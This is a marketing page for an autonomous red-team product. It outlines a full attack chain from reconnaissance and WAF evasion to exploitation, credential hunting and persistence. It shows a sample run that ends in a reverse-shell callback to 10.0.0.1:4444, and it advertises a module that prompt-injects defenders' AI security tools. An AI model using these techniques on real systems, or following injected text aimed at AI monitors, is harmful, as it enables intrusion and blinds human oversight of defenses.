Autonomous Red Team Platform

AKHETOPS
DARK

Eight attack modules. One command. A complete APT-grade kill chain — from OSINT to shell acquisition — fully autonomous. CVE detection, SQL injection, five-path reverse shell delivery.

8 Attack Modules
0% Detection Rate
5 Shell Paths
v3.4 Current Build
Live Feed
[ OSINT ] DNS recon complete — 12 subdomains
[ EVASION ] WAF detected: Nginx — bypasses generated
[ LotL ] Linux chain — 8 steps — DETECTION: HIGH
[ INJECT ] Role hijack — WAF AI compromised
[ C2 ] Cobalt Strike — 0.0% detection rate
[ PIVOT ] Gateway 192.168.0.1 — DNS tunnel active
[ EXPLOIT ] CVE-2019-11043 CRITICAL — PHP 5.6 RCE
[ SHELL ] Session open — uid=33(www-data)
Live Output

ONE COMMAND.
EIGHT WEAPONS.

akhetops-dark — dark_mode.py
$ AKHET_LHOST=10.0.0.1 AKHET_LPORT=4444 bash run_darkmode.sh target.com all full_compromise
[LICENSE] ENTERPRISE — valid until 2027-03-07
[*] Initialising 7 modules in parallel...
[OSINT] Complete — 12 subdomains, 4 exposed endpoints, 2 GitHub leaks
[EVASION] Nginx WAF identified — stealth rating 8/10 — bypasses ready
[LotL] 8-step binary chain — bash, curl, openssl, cron — DETECTION: HIGH
[INJECT] CRITICAL — role hijack injected into WAF AI layer
[C2] Cobalt Strike profile active — 5/5 beacons — 0.0% detection
[PIVOT] Gateway 192.168.0.1 — DNS tunnel established — SSH lateral ready
[*] Parallel phase complete — entering exploit engine...
[EXPLOIT] CVE-2019-11043 — PHP/5.6.40 via FPM — CVSS 9.8 CRITICAL
[EXPLOIT] SQLi confirmed — artists.php[artist], listproducts.php[cat]
[SHELL] Path 1: sqlmap --os-shell — callback received on 10.0.0.1:4444
[SHELL] SESSION OPEN — uid=33(www-data) gid=33(www-data) — KILL CHAIN COMPLETE
[REPORT] darkmode_target.com_20260309_143021.html — 9 findings, 1 RCE
$
Arsenal

THE 8 WEAPONS

01 OSINT
OSINT ENGINE
DNS recon, email harvest, GitHub leak detection, Wayback endpoints, Shodan integration, crt.sh passive subdomains
Active
02 EVADE
EVASION ENGINE
WAF, IDS and EDR detection across 12 vendors. AI-generated bypass playbook per target
Active
03 LotL
LotL ENGINE
Living-off-the-Land attack chains using only native binaries present on the target
Active
04 INJECT
PROMPT INJECTOR
Weaponize AI security tooling. Inject payloads into SOC AI, SIEM AI, WAF AI and log analyzers
Active
05 C2
C2 BEACON SIM
Six real APT profiles — Cobalt Strike, APT29, APT41, Lazarus. Verified 0% detection
Active
06 PIVOT
NETWORK PIVOT
ASN mapping, adjacent host probing, tunnel generation, AI-planned lateral movement chains
Active
07 EXPLOIT
EXPLOIT ENGINE
CVE matching, SQLi, CMDi, LFI, XSS. Five independent shell acquisition paths — sqlmap, MSF, upload, CMDi
Active
08 POSTEX
REMOTE POSTEX
Post-exploitation on target via live shell — privesc recon, credential hunting, persistence
Active
Methodology

THE FULL
KILL CHAIN

01
Reconnaissance
INTELLIGENCE GATHERING
Map the complete attack surface. Subdomains, emails, exposed endpoints, GitHub leaks, tech stack, historical data. Everything the target left behind — found and weaponized.
OSINT ENGINE — dns, whois, shodan, wayback, dorks
02
Bypass
SECURITY STACK EVASION
Identify every defensive layer. WAF vendor, IDS timing signatures, EDR presence, missing headers. Generate AI-tailored bypass techniques specific to what is actually deployed.
EVASION ENGINE — waf, ids, edr, headers, bypasses
03
Execution
NATIVE BINARY ATTACK
No foreign tools. Only what is already there. The AI chains native binaries into an 8-phase sequence — recon, access, execution, privilege escalation, persistence, exfiltration, lateral movement.
LotL ENGINE — bash, python3, curl, openssl, cron, ssh
04
AI Weaponization
POISON THE DEFENDERS
Security teams now run AI. We attack the AI itself — injecting payloads into SOC analysts, SIEM platforms, WAF engines and log analyzers to blind detection before the attack chain runs.
PROMPT INJECTOR — role hijack, jailbreak, amnesia, context switch
05
Command & Control
INVISIBLE PRESENCE
Simulate six real APT C2 profiles. Measure actual detection rates. The platform selects the optimal profile per target and assesses SIEM, EDR and network detection likelihood in real time.
C2 BEACON — cobalt_strike, apt29, apt41, lazarus, fin7
06
Lateral Movement
DEEP NETWORK PIVOT
Map the entire network from the attacker position. Adjacent hosts, internal subnets, high-value services. Multi-hop pivot chains via DNS, SSH and HTTP tunnels into the deepest segments.
NETWORK PIVOT — asn, bgp, scan, dns-tunnel, ssh-chain
07
Exploitation
VULNERABILITY TO SHELL
CVE matching against the detected stack. SQLi, CMDi, LFI and XSS scanning. Five independent shell acquisition paths. First path to land wins.
EXPLOIT ENGINE — cve, sqli, sqlmap, msf, upload, cmdi, reverse_shell
08
Post-Compromise
TOTAL SYSTEM CONTROL
Once a shell is open, post-exploitation runs directly on the target. System enumeration, privilege escalation recon, credential hunting, persistence established. Kill chain complete.
REMOTE POSTEX — id, sudo, suid, .env, id_rsa, bash_history, crontab
Clearance Levels

ACCESS TIERS

Solo
Independent Operators
$49/mo
  • All 8 attack modules
  • 1 machine license
  • Unlimited target runs
  • HTML + JSON reports
  • Community support
Team
Security Firms
$399/mo
  • All 8 attack modules
  • 10 machine licenses
  • Dedicated Slack support
  • API access
  • Custom report branding
Enterprise
Large Red Teams
$999/mo
  • All 8 attack modules
  • Unlimited machines
  • SLA support
  • API + custom modules
  • On-site training
Field Reports

OPERATORS
DON'T LIE

// Senior Red Teamer
The exploit engine identified CVE-2019-11043 on the target PHP stack, confirmed SQL injection on three endpoints and attempted all five shell paths autonomously. The HTML report was client-ready out of the box.
Fortune 500 Security Firm — Authorized Engagement
// Principal Security Researcher
The prompt injection module is genuinely unique. No other tool specifically targets AI security components. We use it to test whether our clients' AI-powered SOC tooling can be manipulated before threat actors find out it can.
Independent Consultant — Research Team
// Bug Bounty — Top 50 HackerOne
Five minutes from launch to a full 8-module report — CVE analysis, confirmed SQLi, shell acquisition paths and a complete pivot strategy. Nothing else in this space produces this level of autonomous output.
Independent Operator — HackerOne Top 50
Who We Are
Helsinki, Finland

BUILT BY
OPERATORS,
FOR OPERATORS.

AkhetOps is a Finnish offensive security research team. We build tools for professional red teamers, penetration testers and security researchers who operate in authorized environments and need automation that keeps pace with real threat actors.

AkhetOps Dark is not a scanner. It is a full autonomous attack chain from the first DNS query to a live reverse shell, built from years of real engagement experience. We automated what was repetitive so operators can focus on what requires human judgment.

Mission: Give professional operators the automation advantage that threat actors already have.
Ethos: We build exclusively for authorized security testing. Every feature is designed for the engagement report, not the headline.
Approach: No black boxes. Every finding is reproducible, every command is logged, every report is client-ready.
Location: Headquartered in Helsinki. Operating globally. Built under Finnish law and GDPR compliance.
8 Attack Modules
3+ Years in Development
100% Authorized Use Only
v3.4 Current Release

The gap between a skilled attacker and a skilled defender has never been about tools. It has always been about speed and consistency. AkhetOps Dark closes that gap — not by replacing the operator, but by eliminating the latency between decision and execution.

AkhetOps Research Team, Helsinki
Technology Stack

BUILT ON THE
INDUSTRY STANDARD.

AkhetOps Dark integrates with the tools already in your workflow. No new agents, no proprietary implants. The platform orchestrates what you already trust and adds autonomous AI reasoning on top.

Exploitation
Core attack tooling
Metasploit, sqlmap, msfvenom, commix, weevely, Cobalt Strike
Reconnaissance
Intelligence gathering
crt.sh, Shodan, theHarvester, Wayback Machine, WHOIS, nslookup, Google Dorks
C2 and Evasion
Command and control
Cobalt Strike profiles, APT29 Cozy Bear, APT41 Winnti, Lazarus MATA, FIN7 Carbanak, dnscat2
Infrastructure
Platform and runtime
Python 3, Groq LLM API, Kali Linux, threading, subprocess, Netlify
Post-Exploitation
On-target operations
GTFOBins, LinPEAS, sudo -l, SUID scan, credential harvest, crontab persistence, bash_history
Early Access

JOIN THE
DARK LIST

Early access, a free 7-day trial key, and first notification when new modules ship. No noise — only clearance upgrades.

  • Free 7-day trial key on approval
  • First access to new modules
  • Solo tier at launch pricing
  • Direct line to the development team

By submitting you agree to our terms. For authorized security testing only.


FULL KILL CHAIN.
ONE COMMAND.

Eight modules. Zero detection. Shell acquired.
